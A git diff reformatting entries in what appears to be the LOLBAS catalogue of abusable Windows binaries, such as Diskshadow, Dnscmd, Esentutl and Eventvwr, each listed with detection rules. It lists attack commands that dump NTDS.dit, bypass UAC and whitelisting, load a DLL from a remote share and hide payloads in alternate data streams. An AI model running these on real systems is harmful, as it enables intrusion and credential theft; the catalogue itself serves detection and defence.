Commands: - - Command: DeviceCredentialDeployment - Description: Grab the console window handle and set it to hidden - Usecase: Can be used to stealthily run a console application (e.g. cmd.exe) in the background - Category: Conceal - Privileges: User - MitreID: T1564 - OperatingSystem: Windows 10 +- Command: DeviceCredentialDeployment + Description: Grab the console window handle and set it to hidden + Usecase: Can be used to stealthily run a console application (e.g. cmd.exe) in the + background + Category: Conceal + Privileges: User + MitreID: T1564 + OperatingSystem: Windows 10 Full_Path: - - Path: C:\Windows\System32\DeviceCredentialDeployment.exe +- Path: C:\Windows\System32\DeviceCredentialDeployment.exe Detection: - - IOC: DeviceCredentialDeployment.exe should not be run on a normal workstation - - Sigma: https://github.com/SigmaHQ/sigma/blob/ff5102832031425f6eed011dd3a2e62653008c94/rules/windows/process_creation/proc_creation_win_lolbin_device_credential_deployment.yml +- IOC: DeviceCredentialDeployment.exe should not be run on a normal workstation +- Sigma: https://github.com/SigmaHQ/sigma/blob/ff5102832031425f6eed011dd3a2e62653008c94/rules/windows/process_creation/proc_creation_win_lolbin_device_credential_deployment.yml Acknowledgement: - - Person: Elliot Killick - Handle: '@elliotkillick' +- Person: Elliot Killick + Handle: '@elliotkillick' diff --git a/yml/OSBinaries/Dfsvc.yml b/yml/OSBinaries/Dfsvc.yml index ce13584c..a5c723fe 100644 --- a/yml/OSBinaries/Dfsvc.yml +++ b/yml/OSBinaries/Dfsvc.yml @@ -1,28 +1,29 @@ ---- Name: Dfsvc.exe Description: ClickOnce engine in Windows used by .NET -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo - Description: Executes click-once-application from Url (trampoline for Dfsvc.exe, DotNet ClickOnce host) - Usecase: Use binary to bypass Application whitelisting - Category: AWL Bypass - Privileges: User - MitreID: T1127 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 +- Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo + Description: Executes click-once-application from Url (trampoline for Dfsvc.exe, + DotNet ClickOnce host) + Usecase: Use binary to bypass Application whitelisting + Category: AWL Bypass + Privileges: User + MitreID: T1127 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows + 11 Full_Path: - - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe - - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe - - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe - - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe +- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe +- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe +- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe +- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe Code_Sample: - - Code: +- Code: null Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_rundll32_activity.yml +- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_rundll32_activity.yml Resources: - - Link: https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf - - Link: https://stackoverflow.com/questions/13312273/clickonce-runtime-dfsvc-exe +- Link: https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf +- Link: https://stackoverflow.com/questions/13312273/clickonce-runtime-dfsvc-exe Acknowledgement: - - Person: Casey Smith - Handle: '@subtee' +- Person: Casey Smith + Handle: '@subtee' diff --git a/yml/OSBinaries/Diantz.yml b/yml/OSBinaries/Diantz.yml index 18d19791..23bb4d94 100644 --- a/yml/OSBinaries/Diantz.yml +++ b/yml/OSBinaries/Diantz.yml @@ -1,37 +1,39 @@ ---- Name: Diantz.exe Description: Binary that package existing files into a cabinet (.cab) file -Author: 'Tamir Yehuda' +Author: Tamir Yehuda Created: 2020-08-08 Commands: - - Command: diantz.exe c:\pathToFile\file.exe c:\destinationFolder\targetFile.txt:targetFile.cab - Description: Compress taget file into a cab file stored in the Alternate Data Stream (ADS) of the target file. - Usecase: Hide data compressed into an Alternate Data Stream. - Category: ADS - Privileges: User - MitreID: T1564.004 - OperatingSystem: Windows XP, Windows vista, Windows 7, Windows 8, Windows 8.1. - - Command: diantz.exe \\remotemachine\pathToFile\file.exe c:\destinationFolder\file.cab - Description: Download and compress a remote file and store it in a cab file on local machine. - Usecase: Download and compress into a cab file. - Category: Download - Privileges: User - MitreID: T1105 - OperatingSystem: Windows Server 2012, Windows Server 2012R2, Windows Server 2016, Windows Server 2019 +- Command: diantz.exe c:\pathToFile\file.exe c:\destinationFolder\targetFile.txt:targetFile.cab + Description: Compress taget file into a cab file stored in the Alternate Data Stream + (ADS) of the target file. + Usecase: Hide data compressed into an Alternate Data Stream. + Category: ADS + Privileges: User + MitreID: T1564.004 + OperatingSystem: Windows XP, Windows vista, Windows 7, Windows 8, Windows 8.1. +- Command: diantz.exe \\remotemachine\pathToFile\file.exe c:\destinationFolder\file.cab + Description: Download and compress a remote file and store it in a cab file on local + machine. + Usecase: Download and compress into a cab file. + Category: Download + Privileges: User + MitreID: T1105 + OperatingSystem: Windows Server 2012, Windows Server 2012R2, Windows Server 2016, + Windows Server 2019 Full_Path: - - Path: c:\windows\system32\diantz.exe - - Path: c:\windows\syswow64\diantz.exe +- Path: c:\windows\system32\diantz.exe +- Path: c:\windows\syswow64\diantz.exe Code_Sample: - - Code: +- Code: null Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/0593446f96c57a8b64e2b5b9fd15a20f1c56acab/rules/windows/process_creation/win_pc_lolbas_diantz_ads.yml - - Sigma: https://github.com/SigmaHQ/sigma/blob/0f33cbc85bf4b23b8d8308bfcc8b21a9e5431ee7/rules/windows/process_creation/win_pc_lolbas_diantz_remote_cab.yml - - IOC: diantz storing data into alternate data streams. - - IOC: diantz getting a file from a remote machine or the internet. +- Sigma: https://github.com/SigmaHQ/sigma/blob/0593446f96c57a8b64e2b5b9fd15a20f1c56acab/rules/windows/process_creation/win_pc_lolbas_diantz_ads.yml +- Sigma: https://github.com/SigmaHQ/sigma/blob/0f33cbc85bf4b23b8d8308bfcc8b21a9e5431ee7/rules/windows/process_creation/win_pc_lolbas_diantz_remote_cab.yml +- IOC: diantz storing data into alternate data streams. +- IOC: diantz getting a file from a remote machine or the internet. Resources: - - Link: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/diantz +- Link: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/diantz Acknowledgement: - - Person: Tamir Yehuda - Handle: '@tim8288' - - Person: Hai Vaknin - Handle: '@vakninhai' +- Person: Tamir Yehuda + Handle: '@tim8288' +- Person: Hai Vaknin + Handle: '@vakninhai' diff --git a/yml/OSBinaries/Diskshadow.yml b/yml/OSBinaries/Diskshadow.yml index 382ecf77..4e99d9ba 100644 --- a/yml/OSBinaries/Diskshadow.yml +++ b/yml/OSBinaries/Diskshadow.yml @@ -1,35 +1,35 @@ ---- Name: Diskshadow.exe -Description: Diskshadow.exe is a tool that exposes the functionality offered by the volume shadow copy Service (VSS). -Author: 'Oddvar Moe' +Description: Diskshadow.exe is a tool that exposes the functionality offered by the + volume shadow copy Service (VSS). +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: diskshadow.exe /s c:\test\diskshadow.txt - Description: Execute commands using diskshadow.exe from a prepared diskshadow script. - Usecase: Use diskshadow to exfiltrate data from VSS such as NTDS.dit - Category: Dump - Privileges: User - MitreID: T1003.003 - OperatingSystem: Windows server - - Command: diskshadow> exec calc.exe - Description: Execute commands using diskshadow.exe to spawn child process - Usecase: Use diskshadow to bypass defensive counter measures - Category: Execute - Privileges: User - MitreID: T1202 - OperatingSystem: Windows server +- Command: diskshadow.exe /s c:\test\diskshadow.txt + Description: Execute commands using diskshadow.exe from a prepared diskshadow script. + Usecase: Use diskshadow to exfiltrate data from VSS such as NTDS.dit + Category: Dump + Privileges: User + MitreID: T1003.003 + OperatingSystem: Windows server +- Command: diskshadow> exec calc.exe + Description: Execute commands using diskshadow.exe to spawn child process + Usecase: Use diskshadow to bypass defensive counter measures + Category: Execute + Privileges: User + MitreID: T1202 + OperatingSystem: Windows server Full_Path: - - Path: C:\Windows\System32\diskshadow.exe - - Path: C:\Windows\SysWOW64\diskshadow.exe +- Path: C:\Windows\System32\diskshadow.exe +- Path: C:\Windows\SysWOW64\diskshadow.exe Code_Sample: - - Code: +- Code: null Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/b4d5b44ea86cda24f38a87d3b0c5f9d4455bf841/rules/windows/process_creation/win_susp_diskshadow.yml - - Sigma: https://github.com/SigmaHQ/sigma/blob/b3df5bf325461df9bcfeb051895b0c8dc3258234/rules/windows/process_creation/win_shadow_copies_deletion.yml - - Elastic: https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml - - IOC: Child process from diskshadow.exe +- Sigma: https://github.com/SigmaHQ/sigma/blob/b4d5b44ea86cda24f38a87d3b0c5f9d4455bf841/rules/windows/process_creation/win_susp_diskshadow.yml +- Sigma: https://github.com/SigmaHQ/sigma/blob/b3df5bf325461df9bcfeb051895b0c8dc3258234/rules/windows/process_creation/win_shadow_copies_deletion.yml +- Elastic: https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml +- IOC: Child process from diskshadow.exe Resources: - - Link: https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/ +- Link: https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/ Acknowledgement: - - Person: Jimmy - Handle: '@bohops' +- Person: Jimmy + Handle: '@bohops' diff --git a/yml/OSBinaries/Dnscmd.yml b/yml/OSBinaries/Dnscmd.yml index e5eea9de..b00ad3ca 100644 --- a/yml/OSBinaries/Dnscmd.yml +++ b/yml/OSBinaries/Dnscmd.yml @@ -1,34 +1,35 @@ ---- Name: Dnscmd.exe Description: A command-line interface for managing DNS servers -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: dnscmd.exe dc1.lab.int /config /serverlevelplugindll \\192.168.0.149\dll\wtf.dll - Description: Adds a specially crafted DLL as a plug-in of the DNS Service. This command must be run on a DC by a user that is at least a member of the DnsAdmins group. See the reference links for DLL details. - Usecase: Remotely inject dll to dns server - Category: Execute - Privileges: DNS admin - MitreID: T1543.003 - OperatingSystem: Windows server +- Command: dnscmd.exe dc1.lab.int /config /serverlevelplugindll \\192.168.0.149\dll\wtf.dll + Description: Adds a specially crafted DLL as a plug-in of the DNS Service. This + command must be run on a DC by a user that is at least a member of the DnsAdmins + group. See the reference links for DLL details. + Usecase: Remotely inject dll to dns server + Category: Execute + Privileges: DNS admin + MitreID: T1543.003 + OperatingSystem: Windows server Full_Path: - - Path: C:\Windows\System32\Dnscmd.exe - - Path: C:\Windows\SysWOW64\Dnscmd.exe +- Path: C:\Windows\System32\Dnscmd.exe +- Path: C:\Windows\SysWOW64\Dnscmd.exe Code_Sample: - - Code: +- Code: null Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/b08b3e2b0d5111c637dbede1381b07cb79f8c2eb/rules/windows/process_creation/process_creation_dns_serverlevelplugindll.yml - - IOC: Dnscmd.exe loading dll from UNC/arbitrary path +- Sigma: https://github.com/SigmaHQ/sigma/blob/b08b3e2b0d5111c637dbede1381b07cb79f8c2eb/rules/windows/process_creation/process_creation_dns_serverlevelplugindll.yml +- IOC: Dnscmd.exe loading dll from UNC/arbitrary path Resources: - - Link: https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83 - - Link: https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html - - Link: https://github.com/dim0x69/dns-exe-persistance/tree/master/dns-plugindll-vcpp - - Link: https://twitter.com/Hexacorn/status/994000792628719618 - - Link: http://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html +- Link: https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83 +- Link: https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html +- Link: https://github.com/dim0x69/dns-exe-persistance/tree/master/dns-plugindll-vcpp +- Link: https://twitter.com/Hexacorn/status/994000792628719618 +- Link: http://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html Acknowledgement: - - Person: Shay Ber - Handle: - - Person: Dimitrios Slamaris - Handle: '@dim0x69' - - Person: Nikhil SamratAshok - Handle: '@nikhil_mitt' +- Person: Shay Ber + Handle: null +- Person: Dimitrios Slamaris + Handle: '@dim0x69' +- Person: Nikhil SamratAshok + Handle: '@nikhil_mitt' diff --git a/yml/OSBinaries/Esentutl.yml b/yml/OSBinaries/Esentutl.yml index e786df8c..20660c98 100644 --- a/yml/OSBinaries/Esentutl.yml +++ b/yml/OSBinaries/Esentutl.yml @@ -1,70 +1,79 @@ ---- Name: Esentutl.exe Description: Binary for working with Microsoft Joint Engine Technology (JET) database -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: esentutl.exe /y C:\folder\sourcefile.vbs /d C:\folder\destfile.vbs /o - Description: Copies the source VBS file to the destination VBS file. - Usecase: Copies files from A to B - Category: Copy - Privileges: User - MitreID: T1105 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - - Command: esentutl.exe /y C:\ADS\file.exe /d c:\ADS\file.txt:file.exe /o - Description: Copies the source EXE to an Alternate Data Stream (ADS) of the destination file. - Usecase: Copy file and hide it in an alternate data stream as a defensive counter measure - Category: ADS - Privileges: User - MitreID: T1564.004 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - - Command: esentutl.exe /y C:\ADS\file.txt:file.exe /d c:\ADS\file.exe /o - Description: Copies the source Alternate Data Stream (ADS) to the destination EXE. - Usecase: Extract hidden file within alternate data streams - Category: ADS - Privileges: User - MitreID: T1564.004 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - - Command: esentutl.exe /y \\192.168.100.100\webdav\file.exe /d c:\ADS\file.txt:file.exe /o - Description: Copies the remote source EXE to the destination Alternate Data Stream (ADS) of the destination file. - Usecase: Copy file and hide it in an alternate data stream as a defensive counter measure - Category: ADS - Privileges: User - MitreID: T1564.004 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - - Command: esentutl.exe /y \\live.sysinternals.com\tools\adrestore.exe /d \\otherwebdavserver\webdav\adrestore.exe /o - Description: Copies the source EXE to the destination EXE file - Usecase: Use to copy files from one unc path to another - Category: Download - Privileges: User - MitreID: T1564.004 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - - Command: esentutl.exe /y /vss c:\windows\ntds\ntds.dit /d c:\folder\ntds.dit - Description: Copies a (locked) file using Volume Shadow Copy - Usecase: Copy/extract a locked file such as the AD Database - Category: Copy - Privileges: Admin - MitreID: T1003.003 - OperatingSystem: Windows 10, Windows 11, Windows 2016 Server, Windows 2019 Server - +- Command: esentutl.exe /y C:\folder\sourcefile.vbs /d C:\folder\destfile.vbs /o + Description: Copies the source VBS file to the destination VBS file. + Usecase: Copies files from A to B + Category: Copy + Privileges: User + MitreID: T1105 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows + 11 +- Command: esentutl.exe /y C:\ADS\file.exe /d c:\ADS\file.txt:file.exe /o + Description: Copies the source EXE to an Alternate Data Stream (ADS) of the destination + file. + Usecase: Copy file and hide it in an alternate data stream as a defensive counter + measure + Category: ADS + Privileges: User + MitreID: T1564.004 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows + 11 +- Command: esentutl.exe /y C:\ADS\file.txt:file.exe /d c:\ADS\file.exe /o + Description: Copies the source Alternate Data Stream (ADS) to the destination EXE. + Usecase: Extract hidden file within alternate data streams + Category: ADS + Privileges: User + MitreID: T1564.004 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows + 11 +- Command: esentutl.exe /y \\192.168.100.100\webdav\file.exe /d c:\ADS\file.txt:file.exe + /o + Description: Copies the remote source EXE to the destination Alternate Data Stream + (ADS) of the destination file. + Usecase: Copy file and hide it in an alternate data stream as a defensive counter + measure + Category: ADS + Privileges: User + MitreID: T1564.004 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows + 11 +- Command: esentutl.exe /y \\live.sysinternals.com\tools\adrestore.exe /d \\otherwebdavserver\webdav\adrestore.exe + /o + Description: Copies the source EXE to the destination EXE file + Usecase: Use to copy files from one unc path to another + Category: Download + Privileges: User + MitreID: T1564.004 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows + 11 +- Command: esentutl.exe /y /vss c:\windows\ntds\ntds.dit /d c:\folder\ntds.dit + Description: Copies a (locked) file using Volume Shadow Copy + Usecase: Copy/extract a locked file such as the AD Database + Category: Copy + Privileges: Admin + MitreID: T1003.003 + OperatingSystem: Windows 10, Windows 11, Windows 2016 Server, Windows 2019 Server Full_Path: - - Path: C:\Windows\System32\esentutl.exe - - Path: C:\Windows\SysWOW64\esentutl.exe +- Path: C:\Windows\System32\esentutl.exe +- Path: C:\Windows\SysWOW64\esentutl.exe Code_Sample: - - Code: +- Code: null Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/fb750721b25ec4573acc32a0822d047a8ecdf269/rules/windows/deprecated/win_susp_vssadmin_ntds_activity.yml - - Sigma: https://github.com/SigmaHQ/sigma/blob/fb750721b25ec4573acc32a0822d047a8ecdf269/rules/windows/deprecated/win_susp_esentutl_activity.yml - - Sigma: https://github.com/SigmaHQ/sigma/blob/bacb44ab972343358bae612e4625f8ba2e043573/rules/windows/process_creation/process_susp_esentutl_params.yml - - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_copying_sensitive_files_with_credential_data.yml - - Splunk: https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/esentutl_sam_copy.yml - - Elastic: https://github.com/elastic/detection-rules/blob/f6421d8c534f295518a2c945f530e8afc4c8ad1b/rules/windows/credential_access_copy_ntds_sam_volshadowcp_cmdline.toml +- Sigma: https://github.com/SigmaHQ/sigma/blob/fb750721b25ec4573acc32a0822d047a8ecdf269/rules/windows/deprecated/win_susp_vssadmin_ntds_activity.yml +- Sigma: https://github.com/SigmaHQ/sigma/blob/fb750721b25ec4573acc32a0822d047a8ecdf269/rules/windows/deprecated/win_susp_esentutl_activity.yml +- Sigma: https://github.com/SigmaHQ/sigma/blob/bacb44ab972343358bae612e4625f8ba2e043573/rules/windows/process_creation/process_susp_esentutl_params.yml +- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_copying_sensitive_files_with_credential_data.yml +- Splunk: https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/esentutl_sam_copy.yml +- Elastic: https://github.com/elastic/detection-rules/blob/f6421d8c534f295518a2c945f530e8afc4c8ad1b/rules/windows/credential_access_copy_ntds_sam_volshadowcp_cmdline.toml Resources: - - Link: https://twitter.com/egre55/status/985994639202283520 - - Link: https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/ - - Link: https://twitter.com/bohops/status/1094810861095534592 +- Link: https://twitter.com/egre55/status/985994639202283520 +- Link: https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/ +- Link: https://twitter.com/bohops/status/1094810861095534592 Acknowledgement: - - Person: egre55 - Handle: '@egre55' - - Person: Mike Cary - Handle: '@grayfold3d' +- Person: egre55 + Handle: '@egre55' +- Person: Mike Cary + Handle: '@grayfold3d' diff --git a/yml/OSBinaries/Eventvwr.yml b/yml/OSBinaries/Eventvwr.yml index 5442927c..2c4e5d6f 100644 --- a/yml/OSBinaries/Eventvwr.yml +++ b/yml/OSBinaries/Eventvwr.yml @@ -1,44 +1,51 @@ ---- Name: Eventvwr.exe Description: Displays Windows Event Logs in a GUI window. -Author: 'Jacob Gajek' +Author: Jacob Gajek Created: 2018-11-01 Commands: - - Command: eventvwr.exe - Description: During startup, eventvwr.exe checks the registry value HKCU\Software\Classes\mscfile\shell\open\command for the location of mmc.exe, which is used to open the eventvwr.msc saved console file. If the location of another binary or script is added to this registry value, it will be executed as a high-integrity process without a UAC prompt being displayed to the user. - Usecase: Execute a binary or script as a high-integrity process without a UAC prompt. - Category: UAC Bypass - Privileges: User - MitreID: T1548.002 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - - Command: ysoserial.exe -o raw -f BinaryFormatter - g DataSet -c calc > RecentViews & copy RecentViews %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews & eventvwr.exe - Description: During startup, eventvwr.exe uses .NET deserialization with %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews file. This file can be created using https://github.com/pwntester/ysoserial.net - Usecase: Execute a command to bypass security restrictions that limit the use of command-line interpreters. - Category: Execute - Privileges: Administrator - MitreID: T1202 - OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10 +- Command: eventvwr.exe + Description: During startup, eventvwr.exe checks the registry value HKCU\Software\Classes\mscfile\shell\open\command + for the location of mmc.exe, which is used to open the eventvwr.msc saved console + file. If the location of another binary or script is added to this registry value, + it will be executed as a high-integrity process without a UAC prompt being displayed + to the user. + Usecase: Execute a binary or script as a high-integrity process without a UAC prompt. + Category: UAC Bypass + Privileges: User + MitreID: T1548.002 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 +- Command: ysoserial.exe -o raw -f BinaryFormatter - g DataSet -c calc > RecentViews + & copy RecentViews %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews & eventvwr.exe + Description: During startup, eventvwr.exe uses .NET deserialization with %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews + file. This file can be created using https://github.com/pwntester/ysoserial.net + Usecase: Execute a command to bypass security restrictions that limit the use of + command-line interpreters. + Category: Execute + Privileges: Administrator + MitreID: T1202 + OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10 Full_Path: - - Path: C:\Windows\System32\eventvwr.exe - - Path: C:\Windows\SysWOW64\eventvwr.exe +- Path: C:\Windows\System32\eventvwr.exe +- Path: C:\Windows\SysWOW64\eventvwr.exe Code_Sample: - - Code: https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-EventVwrBypass.ps1 +- Code: https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-EventVwrBypass.ps1 Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/b08b3e2b0d5111c637dbede1381b07cb79f8c2eb/rules/windows/process_creation/process_creation_sysmon_uac_bypass_eventvwr.yml - - Sigma: https://github.com/SigmaHQ/sigma/blob/b08b3e2b0d5111c637dbede1381b07cb79f8c2eb/rules/windows/registry_event/registry_event_uac_bypass_eventvwr.yml - - Sigma: https://github.com/SigmaHQ/sigma/blob/197615345b927682ab7ad7fa3c5f5bb2ed911eed/rules/windows/file/file_event/file_event_win_uac_bypass_eventvwr.yml - - Elastic: https://github.com/elastic/detection-rules/blob/d31ea6253ea40789b1fc49ade79b7ec92154d12a/rules/windows/privilege_escalation_uac_bypass_event_viewer.toml - - Splunk: https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/eventvwr_uac_bypass.yml - - IOC: eventvwr.exe launching child process other than mmc.exe - - IOC: Creation or modification of the registry value HKCU\Software\Classes\mscfile\shell\open\command +- Sigma: https://github.com/SigmaHQ/sigma/blob/b08b3e2b0d5111c637dbede1381b07cb79f8c2eb/rules/windows/process_creation/process_creation_sysmon_uac_bypass_eventvwr.yml +- Sigma: https://github.com/SigmaHQ/sigma/blob/b08b3e2b0d5111c637dbede1381b07cb79f8c2eb/rules/windows/registry_event/registry_event_uac_bypass_eventvwr.yml +- Sigma: https://github.com/SigmaHQ/sigma/blob/197615345b927682ab7ad7fa3c5f5bb2ed911eed/rules/windows/file/file_event/file_event_win_uac_bypass_eventvwr.yml +- Elastic: https://github.com/elastic/detection-rules/blob/d31ea6253ea40789b1fc49ade79b7ec92154d12a/rules/windows/privilege_escalation_uac_bypass_event_viewer.toml +- Splunk: https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/eventvwr_uac_bypass.yml +- IOC: eventvwr.exe launching child process other than mmc.exe +- IOC: Creation or modification of the registry value HKCU\Software\Classes\mscfile\shell\open\command +- Splunk: https://research.splunk.com/endpoint/9cf8fe08-7ad8-11eb-9819-acde48001122/ Resources: - - Link: https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/ - - Link: https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-EventVwrBypass.ps1 - - Link: https://twitter.com/orange_8361/status/1518970259868626944 +- Link: https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/ +- Link: https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-EventVwrBypass.ps1 +- Link: https://twitter.com/orange_8361/status/1518970259868626944 Acknowledgement: - - Person: Matt Nelson - Handle: '@enigma0x3' - - Person: Matt Graeber - Handle: '@mattifestation' - - Person: Orange Tsai - Handle: '@orange_8361' +- Person: Matt Nelson + Handle: '@enigma0x3' +- Person: Matt Graeber + Handle: '@mattifestation' +- Person: Orange Tsai + Handle: '@orange_8361' diff --git a/yml/OSBinaries/Expand.yml b/yml/OSBinaries/Expand.yml index e671c0ae..962dc0c3 100644 --- a/yml/OSBinaries/Expand.yml +++ b/yml/OSBinaries/Expand.yml @@ -1,43 +1,45 @@ ---- Name: Expand.exe Description: Binary that expands one or more compressed files -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: expand \\webdav\folder\file.bat c:\ADS\file.bat - Description: Copies source file to destination. - Usecase: Use to copies the source file to the destination file - Category: Download - Privileges: User - MitreID: T1105 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - - Command: expand c:\ADS\file1.bat c:\ADS\file2.bat - Description: Copies source file to destination. - Usecase: Copies files from A to B - Category: Copy - Privileges: User - MitreID: T1105 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - - Command: expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat - Description: Copies source file to destination Alternate Data Stream (ADS) - Usecase: Copies files from A to B - Category: ADS - Privileges: User - MitreID: T1564.004 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 +- Command: expand \\webdav\folder\file.bat c:\ADS\file.bat + Description: Copies source file to destination. + Usecase: Use to copies the source file to the destination file + Category: Download + Privileges: User + MitreID: T1105 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows + 11 +- Command: expand c:\ADS\file1.bat c:\ADS\file2.bat + Description: Copies source file to destination. + Usecase: Copies files from A to B + Category: Copy + Privileges: User + MitreID: T1105 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows + 11 +- Command: expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat + Description: Copies source file to destination Alternate Data Stream (ADS) + Usecase: Copies files from A to B + Category: ADS + Privileges: User + MitreID: T1564.004 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows + 11 Full_Path: - - Path: C:\Windows\System32\Expand.exe - - Path: C:\Windows\SysWOW64\Expand.exe +- Path: C:\Windows\System32\Expand.exe +- Path: C:\Windows\SysWOW64\Expand.exe Code_Sample: - - Code: +- Code: null Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/b25fbbea54014565fc4551f94c97c0d7550b1c04/rules/windows/process_creation/sysmon_expand_cabinet_files.yml - - Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml +- Sigma: https://github.com/SigmaHQ/sigma/blob/b25fbbea54014565fc4551f94c97c0d7550b1c04/rules/windows/process_creation/sysmon_expand_cabinet_files.yml +- Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml Resources: - - Link: https://twitter.com/infosecn1nja/status/986628482858807297 - - Link: https://twitter.com/Oddvarmoe/status/986709068759949319 +- Link: https://twitter.com/infosecn1nja/status/986628482858807297 +- Link: https://twitter.com/Oddvarmoe/status/986709068759949319 Acknowledgement: - - Person: Rahmat Nurfauzi - Handle: '@infosecn1nja' - - Person: Oddvar Moe - Handle: '@oddvarmoe' +- Person: Rahmat Nurfauzi + Handle: '@infosecn1nja' +- Person: Oddvar Moe + 